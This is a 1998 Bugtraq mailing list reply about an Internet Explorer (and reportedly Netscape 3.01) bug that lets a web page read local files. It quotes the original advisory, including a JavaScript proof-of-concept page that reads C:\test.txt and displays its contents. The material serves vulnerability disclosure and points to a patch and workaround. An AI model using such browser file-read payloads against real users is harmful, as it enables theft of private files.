Bugtraq mailing list archives

Re: IE can read local files

From: robing () TOTAL NET (Mike Dion)
Date: Sat, 5 Sep 1998 13:36:29 +0200


Netscape Navigator Version 3.01 is vulnerable too...
I didn't test any other netscape versions...

At 04:33 98-09-05 -0400, Georgi Guninski wrote:

There is a bug in Internet Explorer 3, 4.0, 4.01 (for version information

see Microsoft's info below),

which allows a specially designed web page to read text or HTML files from

the user's computer

and send their contents to an arbitrary host, even if the user is behind

firewall. The bug uses Javascript and

the file name and location must be known.

Another way to exploit this bug is to send a specially designed message to

an Outlook Express/IE4  user.


Demonstration of this is available at:

http://www.geocities.com/ResearchTriangle/1711/good-read.html


Workaround: Disable Javascript.
Microsoft has released a patch at:

http://www.microsoft.com/security/bulletins/ms98-013.htm


Georgi Guninski
http://www.geocities.com/ResearchTriangle/1711

The source of the page:
----Cut here---
<HTML>
<HEAD><TITLE>Read text/HTML file with Internet Explorer 4.01></TITLE></HEAD>
<BODY>
This demonstrates a bug in IE 4.01 under Windows 95 (don't know for other

versions), which allows reading text or HTML file on the user's machine.

<B>Create the file c:\test.txt</B> and its contents are shown in a message

box. The file may be sent to an arbitrary server even if behind a firewall.

<BR>
To test it, you need Javascript enabled.
<BR>
This file is created by <A

HREF=http://www.geocities.com/ResearchTriangle/1711>Georgi Guninski.</A>


<SCRIPT LANGUAGE="JAVASCRIPT">

alert("This page demonstrates reading the file C:\\test.txt (you may need

to create a short file to view it)");



var x=window.open('file://C:/test.txt');
x.navigate("javascript:eval(\"var

a=window.open('file://C:/test.txt');r=a.document.body.innerText;alert(r);\")
");


</SCRIPT>
</BODY>
</HTML>


____________________________________________________________________
Get free e-mail and a permanent address at http://www.netaddress.com/?N=1

Current thread:

IE can read local files Georgi Guninski (Sep 05)
- <Possible follow-ups>
- Re: IE can read local files Mike Dion (Sep 05)
- Re: IE can read local files Lynda L. True (Sep 05)
- Re: IE can read local files Steve Moyzis (Sep 05)
- Re: IE can read local files Thomas Davis (Sep 08)